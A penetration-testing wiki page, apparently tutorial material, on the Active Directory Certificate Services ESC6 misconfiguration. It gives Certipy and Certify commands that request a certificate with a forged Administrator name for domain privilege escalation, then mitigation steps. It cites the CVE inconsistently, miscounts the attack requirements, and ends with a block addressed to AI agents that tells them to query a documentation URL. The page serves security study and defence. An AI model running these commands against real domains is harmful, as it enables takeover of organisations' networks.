# ESC6 ## Description ESC6 occurs when a Certificate Authority (CA) has the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag enabled in its configuration. This flag allows certificate requesters to specify arbitrary Subject Alternative Name (SAN) values. If Microsoft’s May 2022 security update for [CVE-2022-26923](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26923) has not been applied, the CA may be vulnerable to privilege escalation. Under these conditions, any certificate template that supports Client Authentication and is enrollable by low-privileged users becomes a potential attack vector. This makes ESC6 similar in effect to ESC1, as an attacker can request a certificate with a forged SAN, impersonating a privileged user. Even the default "User" template could be exploited in this manner, allowing a standard domain user to escalate to a domain administrator. ### Requirements for attack path Access to an account that has at least ONE of the following permissions over a template: * The CA has the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set. * Security patch for CVE-2022-26932 has not been applied to the CA * Access to an account which is permitted to enroll in a template which also supports Client Authentication. (The default user template is sufficient in most cases). ## Linux ### Enumeration {% code overflow="wrap" %} ```python certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.231.141 -vulnerable -stdout ``` {% endcode %}

### Performing the attack {% code overflow="wrap" %} ```python certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.231.141 -ca lab-LAB-DC-CA -template User -upn Administrator@lab.local ``` {% endcode %}

Once retrieved we can follow the remainder of the steps as per ESC1. {% content-ref url="/pages/swG25gAd15pb2tOyNaEx" %} [ESC1](/pentest-everything/everything/everything-active-directory/adcs/esc1.md) {% endcontent-ref %} ## Windows ### Enumeration Certify can be used to check the Certificate Authorities for the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. ```powershell .\Certify.exe cas ```

### Performing the attack The steps to perform the attack are almost identical to ESC1 except we pick the default "User" template or any other candidate template if required. {% code overflow="wrap" %} ```powershell .\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:User /altname:Administrator ``` {% endcode %}

After retrieval, we can follow the remainder of the steps within ESC1 to complete the attack. {% content-ref url="/pages/swG25gAd15pb2tOyNaEx" %} [ESC1](/pentest-everything/everything/everything-active-directory/adcs/esc1.md) {% endcontent-ref %} ## Mitigations * Remove the flag `EDITF_ATTRIBUTESUBJECTALTNAME2` from the Certificate Authority. Run the following on the Certificate Authority as Domain Administrator. ``` certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2 ``` After doing so, restart the service to allow changes to take place. ``` net stop certsvc & net start certsvc ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adcs/esc6.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.